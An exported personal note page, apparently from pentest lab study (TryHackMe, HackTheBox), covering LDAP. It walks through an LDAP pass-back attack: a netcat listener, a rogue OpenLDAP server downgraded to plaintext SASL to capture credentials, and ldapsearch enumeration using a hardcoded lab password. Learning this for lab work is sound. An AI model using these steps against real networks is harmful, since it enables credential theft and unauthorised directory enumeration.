<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>ldap</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>ldap</h1>

      <div class="ck-content">
        <p><a href="https://vk9-sec.com/enumerating-ad-users-with-ldap/">https://vk9-sec.com/enumerating-ad-users-with-ldap/</a> </p>
         <h2>LDAP Pass-back Attacks</h2>

        <p>We can alter the LDAP configuration, such as the IP or hostname of the
          LDAP server. In an LDAP Pass-back attack, we can modify this IP to our
          IP and then test the LDAP configuration, which will force the device to
          attempt LDAP authentication to our rogue device. We can intercept this
          authentication attempt to recover the LDAP credentials.</p>
        <p>using <code>nc -lvp 389</code> we get a callback with creds but it's hidden.
          We have to host a rogue ldap server with paintext passwords.</p>
         <h3>Hosting a Rogue LDAP Server</h3>

        <p>we will use OpenLDAP, install and configure it with:</p><pre><code class="language-text-plain">sudo apt-get update &amp;&amp; sudo apt-get -y install slapd ldap-utils &amp;&amp; sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd</code></pre>

        <p>Terminal Prompt Steps:</p>
        <ol>
          <li>Make sure to press &lt;No&gt; when requested if you want to skip server
            configuration:</li>
          <li>For the DNS domain name, you want to provide our target domain, which
            is <code>za.tryhackme.com</code>

          </li>
          <li>Use this same name for the Organisation name as well:</li>
          <li>Provide any Administrator password</li>
          <li>Select MDB as the LDAP database to use</li>
          <li>For the last two options, ensure the database is not removed when purged</li>
          <li>Move old database files before a new one is created</li>
        </ol>
        <p>Before using the rogue LDAP server, we need to make it vulnerable by downgrading
          the supported authentication mechanisms. We want to ensure that our LDAP
          server only supports PLAIN and LOGIN authentication methods. To do this,
          we need to create a new ldif file, called with the following content:</p>
        <p>filename: <code>olcSaslSecProps.ldif</code>

        </p><pre><code class="language-text-plain">#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred</code></pre>

        <p>The file has the following properties:</p>
        <ul>
          <li><strong>olcSaslSecProps:</strong> Specifies the SASL security properties</li>
          <li><strong>noanonymous:</strong> Disables mechanisms that support anonymous
            login</li>
          <li><strong>minssf:</strong> Specifies the minimum acceptable security strength
            with 0, meaning no protection.</li>
        </ul>
        <p>Now we can use the ldif file to patch our LDAP server using the following:</p><pre><code class="language-text-plain">sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif &amp;&amp; sudo service slapd restart</code></pre>

        <p>We can verify that our rogue LDAP server's configuration has been applied
          using the following command:</p><pre><code class="language-text-plain">ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms</code></pre>

        <p>to get details about ldap, when you have a password</p><pre><code class="language-text-plain">ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName</code></pre>

        <p>for getting <code>CN</code> about a specfic group or user, use this:</p><pre><code class="language-text-plain">ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'</code></pre>

        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>